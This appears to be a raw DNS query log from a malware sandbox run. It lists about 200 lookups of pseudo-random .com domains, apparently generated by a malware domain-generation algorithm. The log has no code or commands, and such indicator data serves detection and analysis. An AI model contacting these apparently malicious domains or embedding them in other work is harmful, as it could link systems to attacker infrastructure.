                                                                                                                                                                                                          Nov 11, 2024 18:24:20.984396935 CET192.168.2.81.1.1.10xeaf8Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.984801054 CET192.168.2.81.1.1.10xedd9Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.997653961 CET192.168.2.81.1.1.10xe189Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.997965097 CET192.168.2.81.1.1.10x369Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.998189926 CET192.168.2.81.1.1.10x4ec1Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.002069950 CET192.168.2.81.1.1.10xbb27Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.002419949 CET192.168.2.81.1.1.10x23d7Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.002886057 CET192.168.2.81.1.1.10xd3c2Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.061799049 CET192.168.2.81.1.1.10x7074Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.068455935 CET192.168.2.81.1.1.10x69d2Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.069173098 CET192.168.2.81.1.1.10xc416Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.069973946 CET192.168.2.81.1.1.10xcba2Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.070483923 CET192.168.2.81.1.1.10x9d04Standard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.092813015 CET192.168.2.81.1.1.10x3ae9Standard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.095741034 CET192.168.2.81.1.1.10x9424Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.113070965 CET192.168.2.81.1.1.10xd20eStandard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.116246939 CET192.168.2.81.1.1.10xe773Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.117970943 CET192.168.2.81.1.1.10x4f08Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.122728109 CET192.168.2.81.1.1.10xb9faStandard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.123003006 CET192.168.2.81.1.1.10xe4a5Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.124754906 CET192.168.2.81.1.1.10xbfb1Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.124933004 CET192.168.2.81.1.1.10x4258Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.750339985 CET192.168.2.81.1.1.10x1189Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.760874033 CET192.168.2.81.1.1.10x7e48Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.761079073 CET192.168.2.81.1.1.10xb844Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.761400938 CET192.168.2.81.1.1.10xa610Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.761584044 CET192.168.2.81.1.1.10x941cStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.762512922 CET192.168.2.81.1.1.10x2b4fStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.762878895 CET192.168.2.81.1.1.10xcb9aStandard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.763044119 CET192.168.2.81.1.1.10x7dd7Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.764082909 CET192.168.2.81.1.1.10x2681Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.764415979 CET192.168.2.81.1.1.10xa58eStandard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.764590979 CET192.168.2.81.1.1.10x3f86Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.765674114 CET192.168.2.81.1.1.10x40a2Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.765846014 CET192.168.2.81.1.1.10x7fc1Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.766026020 CET192.168.2.81.1.1.10x5d46Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.766196012 CET192.168.2.81.1.1.10xfb65Standard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.775088072 CET192.168.2.81.1.1.10x6804Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.776681900 CET192.168.2.81.1.1.10x1f00Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.776940107 CET192.168.2.81.1.1.10xdff8Standard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.777981043 CET192.168.2.81.1.1.10xe232Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.778373957 CET192.168.2.81.1.1.10x62d6Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.778453112 CET192.168.2.81.1.1.10xc4a3Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.778626919 CET192.168.2.81.1.1.10xccf3Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.778914928 CET192.168.2.81.1.1.10x6d89Standard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779166937 CET192.168.2.81.1.1.10x2f15Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779272079 CET192.168.2.81.1.1.10xd830Standard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779423952 CET192.168.2.81.1.1.10xdcc0Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779614925 CET192.168.2.81.1.1.10x2159Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779653072 CET192.168.2.81.1.1.10x1a08Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779848099 CET192.168.2.81.1.1.10x7f80Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.779916048 CET192.168.2.81.1.1.10x9ee7Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.780209064 CET192.168.2.81.1.1.10x634aStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.792960882 CET192.168.2.81.1.1.10xf02eStandard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.794233084 CET192.168.2.81.1.1.10xc3f0Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.281960011 CET192.168.2.81.1.1.10xad5fStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.289123058 CET192.168.2.81.1.1.10x7996Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.301908016 CET192.168.2.81.1.1.10xcdb3Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.317126989 CET192.168.2.81.1.1.10x1680Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.322336912 CET192.168.2.81.1.1.10xd209Standard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.328840017 CET192.168.2.81.1.1.10x90e6Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.341919899 CET192.168.2.81.1.1.10xb690Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.356048107 CET192.168.2.81.1.1.10xdaf7Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.359088898 CET192.168.2.81.1.1.10x665bStandard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.371098042 CET192.168.2.81.1.1.10xfd19Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.393834114 CET192.168.2.81.1.1.10xd918Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.406198025 CET192.168.2.81.1.1.10xd036Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.407701969 CET192.168.2.81.1.1.10xaf83Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.410736084 CET192.168.2.81.1.1.10x3fc7Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.412549973 CET192.168.2.81.1.1.10xe732Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.413563967 CET192.168.2.81.1.1.10xb2faStandard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.416893005 CET192.168.2.81.1.1.10x55c0Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.439410925 CET192.168.2.81.1.1.10x525aStandard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.450527906 CET192.168.2.81.1.1.10x857aStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.450711966 CET192.168.2.81.1.1.10x27acStandard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.450871944 CET192.168.2.81.1.1.10xcbe5Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.451702118 CET192.168.2.81.1.1.10xb981Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.452133894 CET192.168.2.81.1.1.10xd0c1Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.465215921 CET192.168.2.81.1.1.10xa680Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.465713978 CET192.168.2.81.1.1.10xfc40Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.465887070 CET192.168.2.81.1.1.10xef88Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.466032982 CET192.168.2.81.1.1.10x1d48Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.466188908 CET192.168.2.81.1.1.10x3303Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.466420889 CET192.168.2.81.1.1.10x1c11Standard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.466577053 CET192.168.2.81.1.1.10x22c4Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467130899 CET192.168.2.81.1.1.10x3d4Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467243910 CET192.168.2.81.1.1.10x996dStandard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467386961 CET192.168.2.81.1.1.10x206fStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467540979 CET192.168.2.81.1.1.10x32f0Standard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467749119 CET192.168.2.81.1.1.10xd19aStandard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.467888117 CET192.168.2.81.1.1.10x4513Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468044043 CET192.168.2.81.1.1.10x8191Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468206882 CET192.168.2.81.1.1.10x67a8Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468353033 CET192.168.2.81.1.1.10x2ed8Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468504906 CET192.168.2.81.1.1.10x7041Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468647957 CET192.168.2.81.1.1.10x4733Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468791962 CET192.168.2.81.1.1.10x69f3Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.468947887 CET192.168.2.81.1.1.10x2bd8Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469111919 CET192.168.2.81.1.1.10x71aeStandard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469259977 CET192.168.2.81.1.1.10x80aStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469405890 CET192.168.2.81.1.1.10x1a28Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469562054 CET192.168.2.81.1.1.10xcdc3Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.469715118 CET192.168.2.81.1.1.10x849dStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.481894016 CET192.168.2.81.1.1.10xfbf8Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.482558012 CET192.168.2.81.1.1.10xf15cStandard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.482955933 CET192.168.2.81.1.1.10x94abStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.484754086 CET192.168.2.81.1.1.10x54dStandard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.484914064 CET192.168.2.81.1.1.10x3bb1Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733674049 CET192.168.2.81.1.1.10xfc6dStandard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733782053 CET192.168.2.81.1.1.10x4ac0Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733880997 CET192.168.2.81.1.1.10xb367Standard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733985901 CET192.168.2.81.1.1.10x2869Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734227896 CET192.168.2.81.1.1.10xee01Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734265089 CET192.168.2.81.1.1.10x1b16Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734455109 CET192.168.2.81.1.1.10x8b02Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734467983 CET192.168.2.81.1.1.10x1d6dStandard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734674931 CET192.168.2.81.1.1.10x4a08Standard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.745874882 CET192.168.2.81.1.1.10xad6bStandard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746000051 CET192.168.2.81.1.1.10xb4b0Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746175051 CET192.168.2.81.1.1.10x1b62Standard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746678114 CET192.168.2.81.1.1.10x2899Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746841908 CET192.168.2.81.1.1.10x9b19Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747005939 CET192.168.2.81.1.1.10x132Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747189999 CET192.168.2.81.1.1.10x4c82Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747616053 CET192.168.2.81.1.1.10x3d2aStandard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747848034 CET192.168.2.81.1.1.10xa10Standard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748145103 CET192.168.2.81.1.1.10x6dd5Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748385906 CET192.168.2.81.1.1.10xc6f4Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748577118 CET192.168.2.81.1.1.10x4920Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748842001 CET192.168.2.81.1.1.10xad98Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.752604008 CET192.168.2.81.1.1.10xd038Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.752970934 CET192.168.2.81.1.1.10xea2bStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.756412983 CET192.168.2.81.1.1.10x6a4fStandard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.407094002 CET192.168.2.81.1.1.10x7548Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.409181118 CET192.168.2.81.1.1.10x46a8Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.411335945 CET192.168.2.81.1.1.10x5031Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.411710978 CET192.168.2.81.1.1.10x4fb3Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.416416883 CET192.168.2.81.1.1.10x37Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.425599098 CET192.168.2.81.1.1.10x6417Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.429991007 CET192.168.2.81.1.1.10xa9faStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.431046963 CET192.168.2.81.1.1.10x98e6Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.431489944 CET192.168.2.81.1.1.10x9016Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.458750010 CET192.168.2.81.1.1.10x2be7Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.458950043 CET192.168.2.81.1.1.10x63ceStandard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.458986044 CET192.168.2.81.1.1.10x5c9cStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.459173918 CET192.168.2.81.1.1.10xc62bStandard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.459445000 CET192.168.2.81.1.1.10xc0b7Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.459628105 CET192.168.2.81.1.1.10x5c91Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.463248968 CET192.168.2.81.1.1.10x3e31Standard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.463526964 CET192.168.2.81.1.1.10xf6f2Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.465370893 CET192.168.2.81.1.1.10x79faStandard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.465658903 CET192.168.2.81.1.1.10x1d75Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.467786074 CET192.168.2.81.1.1.10xc265Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.467998028 CET192.168.2.81.1.1.10xf723Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.468548059 CET192.168.2.81.1.1.10x5cc0Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.469434023 CET192.168.2.81.1.1.10xcbc9Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.471796989 CET192.168.2.81.1.1.10xd883Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.472723007 CET192.168.2.81.1.1.10x42f9Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.473649025 CET192.168.2.81.1.1.10x143dStandard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.473865032 CET192.168.2.81.1.1.10x74e4Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.474267006 CET192.168.2.81.1.1.10xaf46Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.476170063 CET192.168.2.81.1.1.10xe074Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.476876020 CET192.168.2.81.1.1.10x4488Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.479991913 CET192.168.2.81.1.1.10xa868Standard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.480460882 CET192.168.2.81.1.1.10x568aStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.480632067 CET192.168.2.81.1.1.10x7a02Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.481132984 CET192.168.2.81.1.1.10xcf88Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.483261108 CET192.168.2.81.1.1.10x950fStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.483480930 CET192.168.2.81.1.1.10x47eaStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.483500004 CET192.168.2.81.1.1.10x9169Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.484103918 CET192.168.2.81.1.1.10xa4fStandard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.495964050 CET192.168.2.81.1.1.10x1146Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.496671915 CET192.168.2.81.1.1.10x549eStandard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.496865988 CET192.168.2.81.1.1.10x9f78Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.501802921 CET192.168.2.81.1.1.10x5be2Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.502439022 CET192.168.2.81.1.1.10x64aeStandard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.502561092 CET192.168.2.81.1.1.10xfe7dStandard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.502775908 CET192.168.2.81.1.1.10x1a9bStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.502916098 CET192.168.2.81.1.1.10xaa38Standard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503106117 CET192.168.2.81.1.1.10x56e7Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503207922 CET192.168.2.81.1.1.10x4a04Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503295898 CET192.168.2.81.1.1.10x595fStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503464937 CET192.168.2.81.1.1.10x9907Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
